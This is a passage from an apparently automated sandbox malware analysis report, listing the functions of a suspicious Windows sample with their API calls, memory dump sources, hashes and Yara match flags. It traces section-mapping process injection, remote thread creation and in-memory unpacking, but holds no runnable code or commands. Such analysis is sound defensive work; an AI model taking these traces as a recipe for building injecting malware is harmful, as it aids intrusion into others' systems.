NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02CDFA88 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02CDFAB0
Module32First.KERNEL32(00000000,00000224), ref: 02CDFAD0

Memory Dump Source

Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1425bd21019f149e12327d69b03b8d43886947c1d55cbc0c170fa328c4f98b17
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: A5F062352407146BD7203BB9AC8CB6A76E8BF89624F14052DE747958D0DB70E9454A61

Function 02C9003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C9024D

Strings

cess, xrefs: 02C9018D
kernel32.dll, xrefs: 02C9008F, 02C90095

Memory Dump Source

Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 30f393844056012b558bbd8fca14d04b5a4ced49d37317e27e8b9bbc93423008
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7E525874A01229DFDB64CF68C984BACBBB1BF09314F1480D9E94DAB351DB30AA95DF14

Function 00417363 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(00419530), ref: 00417392
InterlockedDecrement.KERNEL32(?), ref: 004173E0

Strings

k`, xrefs: 004173C3
}$, xrefs: 004173E7

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: DecrementInterlockedLibraryLoad
String ID: k`$}$
API String ID: 1728580480-956986773
Opcode ID: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
Instruction ID: 92a10e5f27b6df14f57ef87c33efa73532c21aaf5ae15a36d787c78b43c6be55
Opcode Fuzzy Hash: ed482a7c5854af87f22181b23428042fc103295a8ee9bf201ac5d4bde5128943
Instruction Fuzzy Hash: 71213A31D482148BC7219B20E8917EA7B30EB48325F52447FDD8997251CB385CD5CB99

Function 00416D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B1AF70), ref: 00416DDF
GetProcAddress.KERNEL32(00000000,0041CF58), ref: 00416E1C
VirtualProtect.KERNELBASE(02B1ADB4,02B1AF6C,00000040,?), ref: 00416E3B

Strings

, xrefs: 00416D45

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
Instruction ID: bfee18a85016a47b5ddbaf570877db746f2843951a7396f5e1c013fbe7522b0d
Opcode Fuzzy Hash: dc14df392f0d3bd85ad7ba04de70e900faee0d950966a715a72806ba0539f216
Instruction Fuzzy Hash: 4C315E559C93C4CAE301CBB8FC847553B63AB29744F408468D148CB3E2D7BA252AC76E

Function 02C90E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C90223,?,?), ref: 02C90E19
SetErrorMode.KERNELBASE(00000000,?,?,02C90223,?,?), ref: 02C90E1E

Memory Dump Source

Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 7fbc46f90dc995f912efcc05dc9be36623145580ffa18c79cd6414e4195930d8
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 5FD0123514512877DB002A94DC0DBCD7B1CDF05B66F008011FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02CDF747 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02CDF798

Memory Dump Source

Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: edd75fea8103a4bc0f974bee35ed1a7a9a5edca2f6d5c6f9f892eb927b147335
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 13113C79A00208EFDB01DF98C985E98BBF5BF08750F068094FA499B361D371EA50EF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00416CD0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B1AF6C,00417344), ref: 00416CD8

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction ID: 2f0f8130ca7dcaba0d5f32f79dbe0382024477fd9a1010909bb1960a3d491594
Opcode Fuzzy Hash: cf794a0f35e8de3d8d653a5275bfdb2b453a73b5f2b2f75a86eba3631d0c60cb
Instruction Fuzzy Hash: C0B092F1D862049BD200CB50E804B603B64A309642F404414F504C2180DB302410CA10

Non-executed Functions

Function 02C9092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02C90966
GetProcAddress., xrefs: 02C909DC, 02C909DF, 02C909E4
., xrefs: 02C9095F

Memory Dump Source

Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 1cffc4cf65e29db40dd3a073ac82601a920c644e98e4645d142af314c4797b14
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 8D3139B6900609DFDB10CF99C884AAEBBF9FF48728F15404AD841AB310D771EA45CFA4

Function 02CDF365 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 02CDC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdc000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 259ca4fbea10e822bc8b2307fec0fb864e244d29fcf165fe2cdca85710027db8
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 9D117C72340100AFDB54DE55DCD0FA673EAFB89220B1A8169EE09CB715D779E842CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02C90D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_3sfCdeA1H2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 9d41ddb34d593106110ca82f8fe8c3ae5447f04cd077c60ecede07d25a12fcc3
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 7501A277A106048FDF21CF24C808BAA33F9EBC6216F4544B5D90A97281E774AA41CB90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1790524742.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3sfCdeA1H2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00416ED0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00416F01
WritePrivateProfileStringW.KERNEL32(00419450,004193D0,00419394,00419340), ref: 00416F25
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00416F2D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00416F6D
GetComputerNameW.KERNEL32(?,?), ref: 00416F81
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416F8F
OpenJobObjectA.KERNEL32(00000000,00000000,004194A0), ref: 00416F9E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00416FAF

Strings

-, xrefs: 00416FBC

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
Instruction ID: 8f7d67f1928f44ffaa59fc403b52841f5e51a7ccc1cf3445b47acfe1213c342b
Opcode Fuzzy Hash: 8379e1a95e74a92e796e3a0bb335547fc287d018873478223eb4169182214a27
Instruction Fuzzy Hash: DA21DB31A4434CABD7109FA4DC49BD97B74EB0C711F1241A9F749AA1C0CAB459C9CB5D

Function 00416FF0 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00417024
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041703F
HeapDestroy.KERNEL32(00000000), ref: 0041705E
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041706D

Memory Dump Source

Source File: 00000000.00000002.1790582710.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_3sfCdeA1H2.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
Instruction ID: 368a894d8ff72c9ccf33279a8f005ab713ac243706c75ee28622bc71169ac13e
Opcode Fuzzy Hash: 3dede072327e3f349e6cf8f7759a4dd28f8ba9426654f24352229ba18d52890c
Instruction Fuzzy Hash: CA01D4B5A403089BD720EB64EC45BEA3BB8EB0C742F40002AE709A7281DF746984CF59

Analysis Process: tttcvvaPID: 6364, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	28.7%
Signature Coverage:	0%
Total number of Nodes:	171
Total number of Limit Nodes:	5

Executed Functions

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2053575399.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_tttcvva.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
